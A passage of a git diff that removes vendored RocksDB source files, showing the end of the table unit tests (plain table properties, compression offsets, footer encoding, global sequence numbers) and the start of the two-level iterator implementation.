-  auto thread2 = port::Thread(func2);
-  thread1.join();
-  thread2.join();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  c.ResetTableReader();
-}
-
-// Plain table is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-TEST_F(PlainTableTest, BasicPlainTableProperties) {
-  PlainTableOptions plain_table_options;
-  plain_table_options.user_key_len = 8;
-  plain_table_options.bloom_bits_per_key = 8;
-  plain_table_options.hash_table_ratio = 0;
-
-  PlainTableFactory factory(plain_table_options);
-  test::StringSink sink;
-  unique_ptr<WritableFileWriter> file_writer(
-      test::GetWritableFileWriter(new test::StringSink()));
-  Options options;
-  const ImmutableCFOptions ioptions(options);
-  InternalKeyComparator ikc(options.comparator);
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-      int_tbl_prop_collector_factories;
-  std::string column_family_name;
-  int unknown_level = -1;
-  std::unique_ptr<TableBuilder> builder(factory.NewTableBuilder(
-      TableBuilderOptions(ioptions, ikc, &int_tbl_prop_collector_factories,
-                          kNoCompression, CompressionOptions(),
-                          nullptr /* compression_dict */,
-                          false /* skip_filters */, column_family_name,
-                          unknown_level),
-      TablePropertiesCollectorFactory::Context::kUnknownColumnFamily,
-      file_writer.get()));
-
-  for (char c = 'a'; c <= 'z'; ++c) {
-    std::string key(8, c);
-    key.append("\1       ");  // PlainTable expects internal key structure
-    std::string value(28, c + 42);
-    builder->Add(key, value);
-  }
-  ASSERT_OK(builder->Finish());
-  file_writer->Flush();
-
-  test::StringSink* ss =
-    static_cast<test::StringSink*>(file_writer->writable_file());
-  unique_ptr<RandomAccessFileReader> file_reader(
-      test::GetRandomAccessFileReader(
-          new test::StringSource(ss->contents(), 72242, true)));
-
-  TableProperties* props = nullptr;
-  auto s = ReadTableProperties(file_reader.get(), ss->contents().size(),
-                               kPlainTableMagicNumber, ioptions,
-                               &props);
-  std::unique_ptr<TableProperties> props_guard(props);
-  ASSERT_OK(s);
-
-  ASSERT_EQ(0ul, props->index_size);
-  ASSERT_EQ(0ul, props->filter_size);
-  ASSERT_EQ(16ul * 26, props->raw_key_size);
-  ASSERT_EQ(28ul * 26, props->raw_value_size);
-  ASSERT_EQ(26ul, props->num_entries);
-  ASSERT_EQ(1ul, props->num_data_blocks);
-}
-#endif  // !ROCKSDB_LITE
-
-TEST_F(GeneralTableTest, ApproximateOffsetOfPlain) {
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  c.Add("k01", "hello");
-  c.Add("k02", "hello2");
-  c.Add("k03", std::string(10000, 'x'));
-  c.Add("k04", std::string(200000, 'x'));
-  c.Add("k05", std::string(300000, 'x'));
-  c.Add("k06", "hello3");
-  c.Add("k07", std::string(100000, 'x'));
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  Options options;
-  test::PlainInternalKeyComparator internal_comparator(options.comparator);
-  options.compression = kNoCompression;
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options, internal_comparator,
-           &keys, &kvmap);
-
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("abc"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k01"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k01a"),      0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k02"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k03"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k04"),   10000,  11000));
-  // k04 and k05 will be in two consecutive blocks, the index is
-  // an arbitrary slice between k04 and k05, either before or after k04a
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k04a"), 10000, 211000));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k05"),  210000, 211000));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k06"),  510000, 511000));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k07"),  510000, 511000));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("xyz"),  610000, 612000));
-  c.ResetTableReader();
-}
-
-static void DoCompressionTest(CompressionType comp) {
-  Random rnd(301);
-  TableConstructor c(BytewiseComparator(), true /* convert_to_internal_key_ */);
-  std::string tmp;
-  c.Add("k01", "hello");
-  c.Add("k02", test::CompressibleString(&rnd, 0.25, 10000, &tmp));
-  c.Add("k03", "hello3");
-  c.Add("k04", test::CompressibleString(&rnd, 0.25, 10000, &tmp));
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  Options options;
-  test::PlainInternalKeyComparator ikc(options.comparator);
-  options.compression = comp;
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options, ikc, &keys, &kvmap);
-
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("abc"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k01"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k02"),       0,      0));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k03"),    2000,   3000));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("k04"),    2000,   3000));
-  ASSERT_TRUE(Between(c.ApproximateOffsetOf("xyz"),    4000,   6100));
-  c.ResetTableReader();
-}
-
-TEST_F(GeneralTableTest, ApproximateOffsetOfCompressed) {
-  std::vector<CompressionType> compression_state;
-  if (!Snappy_Supported()) {
-    fprintf(stderr, "skipping snappy compression tests\n");
-  } else {
-    compression_state.push_back(kSnappyCompression);
-  }
-
-  if (!Zlib_Supported()) {
-    fprintf(stderr, "skipping zlib compression tests\n");
-  } else {
-    compression_state.push_back(kZlibCompression);
-  }
-
-  // TODO(kailiu) DoCompressionTest() doesn't work with BZip2.
-  /*
-  if (!BZip2_Supported()) {
-    fprintf(stderr, "skipping bzip2 compression tests\n");
-  } else {
-    compression_state.push_back(kBZip2Compression);
-  }
-  */
-
-  if (!LZ4_Supported()) {
-    fprintf(stderr, "skipping lz4 and lz4hc compression tests\n");
-  } else {
-    compression_state.push_back(kLZ4Compression);
-    compression_state.push_back(kLZ4HCCompression);
-  }
-
-  if (!XPRESS_Supported()) {
-    fprintf(stderr, "skipping xpress and xpress compression tests\n");
-  }
-  else {
-    compression_state.push_back(kXpressCompression);
-  }
-
-  for (auto state : compression_state) {
-    DoCompressionTest(state);
-  }
-}
-
-TEST_F(HarnessTest, Randomized) {
-  std::vector<TestArgs> args = GenerateArgList();
-  for (unsigned int i = 0; i < args.size(); i++) {
-    Init(args[i]);
-    Random rnd(test::RandomSeed() + 5);
-    for (int num_entries = 0; num_entries < 2000;
-         num_entries += (num_entries < 50 ? 1 : 200)) {
-      if ((num_entries % 10) == 0) {
-        fprintf(stderr, "case %d of %d: num_entries = %d\n", (i + 1),
-                static_cast<int>(args.size()), num_entries);
-      }
-      for (int e = 0; e < num_entries; e++) {
-        std::string v;
-        Add(test::RandomKey(&rnd, rnd.Skewed(4)),
-            test::RandomString(&rnd, rnd.Skewed(5), &v).ToString());
-      }
-      Test(&rnd);
-    }
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(HarnessTest, RandomizedLongDB) {
-  Random rnd(test::RandomSeed());
-  TestArgs args = {DB_TEST, false, 16, kNoCompression, 0, false};
-  Init(args);
-  int num_entries = 100000;
-  for (int e = 0; e < num_entries; e++) {
-    std::string v;
-    Add(test::RandomKey(&rnd, rnd.Skewed(4)),
-        test::RandomString(&rnd, rnd.Skewed(5), &v).ToString());
-  }
-  Test(&rnd);
-
-  // We must have created enough data to force merging
-  int files = 0;
-  for (int level = 0; level < db()->NumberLevels(); level++) {
-    std::string value;
-    char name[100];
-    snprintf(name, sizeof(name), "rocksdb.num-files-at-level%d", level);
-    ASSERT_TRUE(db()->GetProperty(name, &value));
-    files += atoi(value.c_str());
-  }
-  ASSERT_GT(files, 0);
-}
-#endif  // ROCKSDB_LITE
-
-class MemTableTest : public testing::Test {};
-
-TEST_F(MemTableTest, Simple) {
-  InternalKeyComparator cmp(BytewiseComparator());
-  auto table_factory = std::make_shared<SkipListFactory>();
-  Options options;
-  options.memtable_factory = table_factory;
-  ImmutableCFOptions ioptions(options);
-  WriteBufferManager wb(options.db_write_buffer_size);
-  MemTable* memtable =
-      new MemTable(cmp, ioptions, MutableCFOptions(options), &wb,
-                   kMaxSequenceNumber, 0 /* column_family_id */);
-  memtable->Ref();
-  WriteBatch batch;
-  WriteBatchInternal::SetSequence(&batch, 100);
-  batch.Put(std::string("k1"), std::string("v1"));
-  batch.Put(std::string("k2"), std::string("v2"));
-  batch.Put(std::string("k3"), std::string("v3"));
-  batch.Put(std::string("largekey"), std::string("vlarge"));
-  batch.DeleteRange(std::string("chi"), std::string("xigua"));
-  batch.DeleteRange(std::string("begin"), std::string("end"));
-  ColumnFamilyMemTablesDefault cf_mems_default(memtable);
-  ASSERT_TRUE(
-      WriteBatchInternal::InsertInto(&batch, &cf_mems_default, nullptr).ok());
-
-  for (int i = 0; i < 2; ++i) {
-    Arena arena;
-    ScopedArenaIterator arena_iter_guard;
-    std::unique_ptr<InternalIterator> iter_guard;
-    InternalIterator* iter;
-    if (i == 0) {
-      iter = memtable->NewIterator(ReadOptions(), &arena);
-      arena_iter_guard.set(iter);
-    } else {
-      iter = memtable->NewRangeTombstoneIterator(ReadOptions());
-      iter_guard.reset(iter);
-    }
-    if (iter == nullptr) {
-      continue;
-    }
-    iter->SeekToFirst();
-    while (iter->Valid()) {
-      fprintf(stderr, "key: '%s' -> '%s'\n", iter->key().ToString().c_str(),
-              iter->value().ToString().c_str());
-      iter->Next();
-    }
-  }
-
-  delete memtable->Unref();
-}
-
-// Test the empty key
-TEST_F(HarnessTest, SimpleEmptyKey) {
-  auto args = GenerateArgList();
-  for (const auto& arg : args) {
-    Init(arg);
-    Random rnd(test::RandomSeed() + 1);
-    Add("", "v");
-    Test(&rnd);
-  }
-}
-
-TEST_F(HarnessTest, SimpleSingle) {
-  auto args = GenerateArgList();
-  for (const auto& arg : args) {
-    Init(arg);
-    Random rnd(test::RandomSeed() + 2);
-    Add("abc", "v");
-    Test(&rnd);
-  }
-}
-
-TEST_F(HarnessTest, SimpleMulti) {
-  auto args = GenerateArgList();
-  for (const auto& arg : args) {
-    Init(arg);
-    Random rnd(test::RandomSeed() + 3);
-    Add("abc", "v");
-    Add("abcd", "v");
-    Add("ac", "v2");
-    Test(&rnd);
-  }
-}
-
-TEST_F(HarnessTest, SimpleSpecialKey) {
-  auto args = GenerateArgList();
-  for (const auto& arg : args) {
-    Init(arg);
-    Random rnd(test::RandomSeed() + 4);
-    Add("\xff\xff", "v3");
-    Test(&rnd);
-  }
-}
-
-TEST_F(HarnessTest, FooterTests) {
-  {
-    // upconvert legacy block based
-    std::string encoded;
-    Footer footer(kLegacyBlockBasedTableMagicNumber, 0);
-    BlockHandle meta_index(10, 5), index(20, 15);
-    footer.set_metaindex_handle(meta_index);
-    footer.set_index_handle(index);
-    footer.EncodeTo(&encoded);
-    Footer decoded_footer;
-    Slice encoded_slice(encoded);
-    decoded_footer.DecodeFrom(&encoded_slice);
-    ASSERT_EQ(decoded_footer.table_magic_number(), kBlockBasedTableMagicNumber);
-    ASSERT_EQ(decoded_footer.checksum(), kCRC32c);
-    ASSERT_EQ(decoded_footer.metaindex_handle().offset(), meta_index.offset());
-    ASSERT_EQ(decoded_footer.metaindex_handle().size(), meta_index.size());
-    ASSERT_EQ(decoded_footer.index_handle().offset(), index.offset());
-    ASSERT_EQ(decoded_footer.index_handle().size(), index.size());
-    ASSERT_EQ(decoded_footer.version(), 0U);
-  }
-  {
-    // xxhash block based
-    std::string encoded;
-    Footer footer(kBlockBasedTableMagicNumber, 1);
-    BlockHandle meta_index(10, 5), index(20, 15);
-    footer.set_metaindex_handle(meta_index);
-    footer.set_index_handle(index);
-    footer.set_checksum(kxxHash);
-    footer.EncodeTo(&encoded);
-    Footer decoded_footer;
-    Slice encoded_slice(encoded);
-    decoded_footer.DecodeFrom(&encoded_slice);
-    ASSERT_EQ(decoded_footer.table_magic_number(), kBlockBasedTableMagicNumber);
-    ASSERT_EQ(decoded_footer.checksum(), kxxHash);
-    ASSERT_EQ(decoded_footer.metaindex_handle().offset(), meta_index.offset());
-    ASSERT_EQ(decoded_footer.metaindex_handle().size(), meta_index.size());
-    ASSERT_EQ(decoded_footer.index_handle().offset(), index.offset());
-    ASSERT_EQ(decoded_footer.index_handle().size(), index.size());
-    ASSERT_EQ(decoded_footer.version(), 1U);
-  }
-// Plain table is not supported in ROCKSDB_LITE
-#ifndef ROCKSDB_LITE
-  {
-    // upconvert legacy plain table
-    std::string encoded;
-    Footer footer(kLegacyPlainTableMagicNumber, 0);
-    BlockHandle meta_index(10, 5), index(20, 15);
-    footer.set_metaindex_handle(meta_index);
-    footer.set_index_handle(index);
-    footer.EncodeTo(&encoded);
-    Footer decoded_footer;
-    Slice encoded_slice(encoded);
-    decoded_footer.DecodeFrom(&encoded_slice);
-    ASSERT_EQ(decoded_footer.table_magic_number(), kPlainTableMagicNumber);
-    ASSERT_EQ(decoded_footer.checksum(), kCRC32c);
-    ASSERT_EQ(decoded_footer.metaindex_handle().offset(), meta_index.offset());
-    ASSERT_EQ(decoded_footer.metaindex_handle().size(), meta_index.size());
-    ASSERT_EQ(decoded_footer.index_handle().offset(), index.offset());
-    ASSERT_EQ(decoded_footer.index_handle().size(), index.size());
-    ASSERT_EQ(decoded_footer.version(), 0U);
-  }
-  {
-    // xxhash block based
-    std::string encoded;
-    Footer footer(kPlainTableMagicNumber, 1);
-    BlockHandle meta_index(10, 5), index(20, 15);
-    footer.set_metaindex_handle(meta_index);
-    footer.set_index_handle(index);
-    footer.set_checksum(kxxHash);
-    footer.EncodeTo(&encoded);
-    Footer decoded_footer;
-    Slice encoded_slice(encoded);
-    decoded_footer.DecodeFrom(&encoded_slice);
-    ASSERT_EQ(decoded_footer.table_magic_number(), kPlainTableMagicNumber);
-    ASSERT_EQ(decoded_footer.checksum(), kxxHash);
-    ASSERT_EQ(decoded_footer.metaindex_handle().offset(), meta_index.offset());
-    ASSERT_EQ(decoded_footer.metaindex_handle().size(), meta_index.size());
-    ASSERT_EQ(decoded_footer.index_handle().offset(), index.offset());
-    ASSERT_EQ(decoded_footer.index_handle().size(), index.size());
-    ASSERT_EQ(decoded_footer.version(), 1U);
-  }
-#endif  // !ROCKSDB_LITE
-  {
-    // version == 2
-    std::string encoded;
-    Footer footer(kBlockBasedTableMagicNumber, 2);
-    BlockHandle meta_index(10, 5), index(20, 15);
-    footer.set_metaindex_handle(meta_index);
-    footer.set_index_handle(index);
-    footer.EncodeTo(&encoded);
-    Footer decoded_footer;
-    Slice encoded_slice(encoded);
-    decoded_footer.DecodeFrom(&encoded_slice);
-    ASSERT_EQ(decoded_footer.table_magic_number(), kBlockBasedTableMagicNumber);
-    ASSERT_EQ(decoded_footer.checksum(), kCRC32c);
-    ASSERT_EQ(decoded_footer.metaindex_handle().offset(), meta_index.offset());
-    ASSERT_EQ(decoded_footer.metaindex_handle().size(), meta_index.size());
-    ASSERT_EQ(decoded_footer.index_handle().offset(), index.offset());
-    ASSERT_EQ(decoded_footer.index_handle().size(), index.size());
-    ASSERT_EQ(decoded_footer.version(), 2U);
-  }
-}
-
-class IndexBlockRestartIntervalTest
-    : public BlockBasedTableTest,
-      public ::testing::WithParamInterface<int> {
- public:
-  static std::vector<int> GetRestartValues() { return {-1, 0, 1, 8, 16, 32}; }
-};
-
-INSTANTIATE_TEST_CASE_P(
-    IndexBlockRestartIntervalTest, IndexBlockRestartIntervalTest,
-    ::testing::ValuesIn(IndexBlockRestartIntervalTest::GetRestartValues()));
-
-TEST_P(IndexBlockRestartIntervalTest, IndexBlockRestartInterval) {
-  const int kKeysInTable = 10000;
-  const int kKeySize = 100;
-  const int kValSize = 500;
-
-  int index_block_restart_interval = GetParam();
-
-  Options options;
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 64;  // small block size to get big index block
-  table_options.index_block_restart_interval = index_block_restart_interval;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-
-  TableConstructor c(BytewiseComparator());
-  static Random rnd(301);
-  for (int i = 0; i < kKeysInTable; i++) {
-    InternalKey k(RandomString(&rnd, kKeySize), 0, kTypeValue);
-    c.Add(k.Encode().ToString(), RandomString(&rnd, kValSize));
-  }
-
-  std::vector<std::string> keys;
-  stl_wrappers::KVMap kvmap;
-  std::unique_ptr<InternalKeyComparator> comparator(
-      new InternalKeyComparator(BytewiseComparator()));
-  const ImmutableCFOptions ioptions(options);
-  c.Finish(options, ioptions, table_options, *comparator, &keys, &kvmap);
-  auto reader = c.GetTableReader();
-
-  std::unique_ptr<InternalIterator> db_iter(reader->NewIterator(ReadOptions()));
-
-  // Test point lookup
-  for (auto& kv : kvmap) {
-    db_iter->Seek(kv.first);
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_OK(db_iter->status());
-    ASSERT_EQ(db_iter->key(), kv.first);
-    ASSERT_EQ(db_iter->value(), kv.second);
-  }
-
-  // Test iterating
-  auto kv_iter = kvmap.begin();
-  for (db_iter->SeekToFirst(); db_iter->Valid(); db_iter->Next()) {
-    ASSERT_EQ(db_iter->key(), kv_iter->first);
-    ASSERT_EQ(db_iter->value(), kv_iter->second);
-    kv_iter++;
-  }
-  ASSERT_EQ(kv_iter, kvmap.end());
-  c.ResetTableReader();
-}
-
-class PrefixTest : public testing::Test {
- public:
-  PrefixTest() : testing::Test() {}
-  ~PrefixTest() {}
-};
-
-namespace {
-// A simple PrefixExtractor that only works for test PrefixAndWholeKeyTest
-class TestPrefixExtractor : public rocksdb::SliceTransform {
- public:
-  ~TestPrefixExtractor() override{};
-  const char* Name() const override { return "TestPrefixExtractor"; }
-
-  rocksdb::Slice Transform(const rocksdb::Slice& src) const override {
-    assert(IsValid(src));
-    return rocksdb::Slice(src.data(), 3);
-  }
-
-  bool InDomain(const rocksdb::Slice& src) const override {
-    assert(IsValid(src));
-    return true;
-  }
-
-  bool InRange(const rocksdb::Slice& dst) const override { return true; }
-
-  bool IsValid(const rocksdb::Slice& src) const {
-    if (src.size() != 4) {
-      return false;
-    }
-    if (src[0] != '[') {
-      return false;
-    }
-    if (src[1] < '0' || src[1] > '9') {
-      return false;
-    }
-    if (src[2] != ']') {
-      return false;
-    }
-    if (src[3] < '0' || src[3] > '9') {
-      return false;
-    }
-    return true;
-  }
-};
-}  // namespace
-
-TEST_F(PrefixTest, PrefixAndWholeKeyTest) {
-  rocksdb::Options options;
-  options.compaction_style = rocksdb::kCompactionStyleUniversal;
-  options.num_levels = 20;
-  options.create_if_missing = true;
-  options.optimize_filters_for_hits = false;
-  options.target_file_size_base = 268435456;
-  options.prefix_extractor = std::make_shared<TestPrefixExtractor>();
-  rocksdb::BlockBasedTableOptions bbto;
-  bbto.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10));
-  bbto.block_size = 262144;
-  bbto.whole_key_filtering = true;
-
-  const std::string kDBPath = test::TmpDir() + "/table_prefix_test";
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  DestroyDB(kDBPath, options);
-  rocksdb::DB* db;
-  ASSERT_OK(rocksdb::DB::Open(options, kDBPath, &db));
-
-  // Create a bunch of keys with 10 filters.
-  for (int i = 0; i < 10; i++) {
-    std::string prefix = "[" + std::to_string(i) + "]";
-    for (int j = 0; j < 10; j++) {
-      std::string key = prefix + std::to_string(j);
-      db->Put(rocksdb::WriteOptions(), key, "1");
-    }
-  }
-
-  // Trigger compaction.
-  db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  delete db;
-  // In the second round, turn whole_key_filtering off and expect
-  // rocksdb still works.
-}
-
-TEST_F(BlockBasedTableTest, TableWithGlobalSeqno) {
-  BlockBasedTableOptions bbto;
-  test::StringSink* sink = new test::StringSink();
-  unique_ptr<WritableFileWriter> file_writer(test::GetWritableFileWriter(sink));
-  Options options;
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  const ImmutableCFOptions ioptions(options);
-  InternalKeyComparator ikc(options.comparator);
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-      int_tbl_prop_collector_factories;
-  int_tbl_prop_collector_factories.emplace_back(
-      new SstFileWriterPropertiesCollectorFactory(2 /* version */,
-                                                  0 /* global_seqno*/));
-  std::string column_family_name;
-  std::unique_ptr<TableBuilder> builder(options.table_factory->NewTableBuilder(
-      TableBuilderOptions(ioptions, ikc, &int_tbl_prop_collector_factories,
-                          kNoCompression, CompressionOptions(),
-                          nullptr /* compression_dict */,
-                          false /* skip_filters */, column_family_name, -1),
-      TablePropertiesCollectorFactory::Context::kUnknownColumnFamily,
-      file_writer.get()));
-
-  for (char c = 'a'; c <= 'z'; ++c) {
-    std::string key(8, c);
-    std::string value = key;
-    InternalKey ik(key, 0, kTypeValue);
-
-    builder->Add(ik.Encode(), value);
-  }
-  ASSERT_OK(builder->Finish());
-  file_writer->Flush();
-
-  test::RandomRWStringSink ss_rw(sink);
-  uint32_t version;
-  uint64_t global_seqno;
-  uint64_t global_seqno_offset;
-
-  // Helper function to get version, global_seqno, global_seqno_offset
-  std::function<void()> GetVersionAndGlobalSeqno = [&]() {
-    unique_ptr<RandomAccessFileReader> file_reader(
-        test::GetRandomAccessFileReader(
-            new test::StringSource(ss_rw.contents(), 73342, true)));
-
-    TableProperties* props = nullptr;
-    ASSERT_OK(ReadTableProperties(file_reader.get(), ss_rw.contents().size(),
-                                  kBlockBasedTableMagicNumber, ioptions,
-                                  &props));
-
-    UserCollectedProperties user_props = props->user_collected_properties;
-    version = DecodeFixed32(
-        user_props[ExternalSstFilePropertyNames::kVersion].c_str());
-    global_seqno = DecodeFixed64(
-        user_props[ExternalSstFilePropertyNames::kGlobalSeqno].c_str());
-    global_seqno_offset =
-        props->properties_offsets[ExternalSstFilePropertyNames::kGlobalSeqno];
-
-    delete props;
-  };
-
-  // Helper function to update the value of the global seqno in the file
-  std::function<void(uint64_t)> SetGlobalSeqno = [&](uint64_t val) {
-    std::string new_global_seqno;
-    PutFixed64(&new_global_seqno, val);
-
-    ASSERT_OK(ss_rw.Write(global_seqno_offset, new_global_seqno));
-  };
-
-  // Helper function to get the contents of the table InternalIterator
-  unique_ptr<TableReader> table_reader;
-  std::function<InternalIterator*()> GetTableInternalIter = [&]() {
-    unique_ptr<RandomAccessFileReader> file_reader(
-        test::GetRandomAccessFileReader(
-            new test::StringSource(ss_rw.contents(), 73342, true)));
-
-    options.table_factory->NewTableReader(
-        TableReaderOptions(ioptions, EnvOptions(), ikc), std::move(file_reader),
-        ss_rw.contents().size(), &table_reader);
-
-    return table_reader->NewIterator(ReadOptions());
-  };
-
-  GetVersionAndGlobalSeqno();
-  ASSERT_EQ(2, version);
-  ASSERT_EQ(0, global_seqno);
-
-  InternalIterator* iter = GetTableInternalIter();
-  char current_c = 'a';
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ParsedInternalKey pik;
-    ASSERT_TRUE(ParseInternalKey(iter->key(), &pik));
-
-    ASSERT_EQ(pik.type, ValueType::kTypeValue);
-    ASSERT_EQ(pik.sequence, 0);
-    ASSERT_EQ(pik.user_key, iter->value());
-    ASSERT_EQ(pik.user_key.ToString(), std::string(8, current_c));
-    current_c++;
-  }
-  ASSERT_EQ(current_c, 'z' + 1);
-  delete iter;
-
-  // Update global sequence number to 10
-  SetGlobalSeqno(10);
-  GetVersionAndGlobalSeqno();
-  ASSERT_EQ(2, version);
-  ASSERT_EQ(10, global_seqno);
-
-  iter = GetTableInternalIter();
-  current_c = 'a';
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ParsedInternalKey pik;
-    ASSERT_TRUE(ParseInternalKey(iter->key(), &pik));
-
-    ASSERT_EQ(pik.type, ValueType::kTypeValue);
-    ASSERT_EQ(pik.sequence, 10);
-    ASSERT_EQ(pik.user_key, iter->value());
-    ASSERT_EQ(pik.user_key.ToString(), std::string(8, current_c));
-    current_c++;
-  }
-  ASSERT_EQ(current_c, 'z' + 1);
-
-  // Verify Seek
-  for (char c = 'a'; c <= 'z'; c++) {
-    std::string k = std::string(8, c);
-    InternalKey ik(k, 10, kValueTypeForSeek);
-    iter->Seek(ik.Encode());
-    ASSERT_TRUE(iter->Valid());
-
-    ParsedInternalKey pik;
-    ASSERT_TRUE(ParseInternalKey(iter->key(), &pik));
-
-    ASSERT_EQ(pik.type, ValueType::kTypeValue);
-    ASSERT_EQ(pik.sequence, 10);
-    ASSERT_EQ(pik.user_key.ToString(), k);
-    ASSERT_EQ(iter->value().ToString(), k);
-  }
-  delete iter;
-
-  // Update global sequence number to 3
-  SetGlobalSeqno(3);
-  GetVersionAndGlobalSeqno();
-  ASSERT_EQ(2, version);
-  ASSERT_EQ(3, global_seqno);
-
-  iter = GetTableInternalIter();
-  current_c = 'a';
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ParsedInternalKey pik;
-    ASSERT_TRUE(ParseInternalKey(iter->key(), &pik));
-
-    ASSERT_EQ(pik.type, ValueType::kTypeValue);
-    ASSERT_EQ(pik.sequence, 3);
-    ASSERT_EQ(pik.user_key, iter->value());
-    ASSERT_EQ(pik.user_key.ToString(), std::string(8, current_c));
-    current_c++;
-  }
-  ASSERT_EQ(current_c, 'z' + 1);
-
-  // Verify Seek
-  for (char c = 'a'; c <= 'z'; c++) {
-    std::string k = std::string(8, c);
-    // seqno=4 is less than 3 so we still should get our key
-    InternalKey ik(k, 4, kValueTypeForSeek);
-    iter->Seek(ik.Encode());
-    ASSERT_TRUE(iter->Valid());
-
-    ParsedInternalKey pik;
-    ASSERT_TRUE(ParseInternalKey(iter->key(), &pik));
-
-    ASSERT_EQ(pik.type, ValueType::kTypeValue);
-    ASSERT_EQ(pik.sequence, 3);
-    ASSERT_EQ(pik.user_key.ToString(), k);
-    ASSERT_EQ(iter->value().ToString(), k);
-  }
-
-  delete iter;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/two_level_iterator.cc b/thirdparty/rocksdb/table/two_level_iterator.cc
deleted file mode 100644
index 2236a2a..0000000
--- a/thirdparty/rocksdb/table/two_level_iterator.cc
+++ /dev/null
@@ -1,267 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/two_level_iterator.h"
-#include "db/pinned_iterators_manager.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-#include "table/block.h"
-#include "table/format.h"
-#include "util/arena.h"
-
-namespace rocksdb {
-
-namespace {
-
-class TwoLevelIterator : public InternalIterator {
- public:
-  explicit TwoLevelIterator(TwoLevelIteratorState* state,
-                            InternalIterator* first_level_iter,
-                            bool need_free_iter_and_state);
-
-  virtual ~TwoLevelIterator() {
-    // Assert that the TwoLevelIterator is never deleted while Pinning is
-    // Enabled.
-    assert(!pinned_iters_mgr_ ||
-           (pinned_iters_mgr_ && !pinned_iters_mgr_->PinningEnabled()));
-    first_level_iter_.DeleteIter(!need_free_iter_and_state_);
-    second_level_iter_.DeleteIter(false);
-    if (need_free_iter_and_state_) {
-      delete state_;
-    } else {
-      state_->~TwoLevelIteratorState();
-    }
-  }
-
-  virtual void Seek(const Slice& target) override;
-  virtual void SeekForPrev(const Slice& target) override;
-  virtual void SeekToFirst() override;
-  virtual void SeekToLast() override;
-  virtual void Next() override;
-  virtual void Prev() override;
-
-  virtual bool Valid() const override { return second_level_iter_.Valid(); }
-  virtual Slice key() const override {
-    assert(Valid());
-    return second_level_iter_.key();
-  }
-  virtual Slice value() const override {
-    assert(Valid());
-    return second_level_iter_.value();
-  }
-  virtual Status status() const override {
-    // It'd be nice if status() returned a const Status& instead of a Status
-    if (!first_level_iter_.status().ok()) {
-      return first_level_iter_.status();
-    } else if (second_level_iter_.iter() != nullptr &&
-               !second_level_iter_.status().ok()) {
-      return second_level_iter_.status();
-    } else {
-      return status_;
-    }
-  }
-  virtual void SetPinnedItersMgr(
-      PinnedIteratorsManager* pinned_iters_mgr) override {
-    pinned_iters_mgr_ = pinned_iters_mgr;
-    first_level_iter_.SetPinnedItersMgr(pinned_iters_mgr);
-    if (second_level_iter_.iter()) {
-      second_level_iter_.SetPinnedItersMgr(pinned_iters_mgr);
-    }
-  }
-  virtual bool IsKeyPinned() const override {
-    return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-           second_level_iter_.iter() && second_level_iter_.IsKeyPinned();
-  }
-  virtual bool IsValuePinned() const override {
-    return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-           second_level_iter_.iter() && second_level_iter_.IsValuePinned();
-  }
-
- private:
-  void SaveError(const Status& s) {
-    if (status_.ok() && !s.ok()) status_ = s;
-  }
-  void SkipEmptyDataBlocksForward();
-  void SkipEmptyDataBlocksBackward();
-  void SetSecondLevelIterator(InternalIterator* iter);
-  void InitDataBlock();
-
-  TwoLevelIteratorState* state_;
-  IteratorWrapper first_level_iter_;
-  IteratorWrapper second_level_iter_;  // May be nullptr
-  bool need_free_iter_and_state_;
-  PinnedIteratorsManager* pinned_iters_mgr_;
-  Status status_;
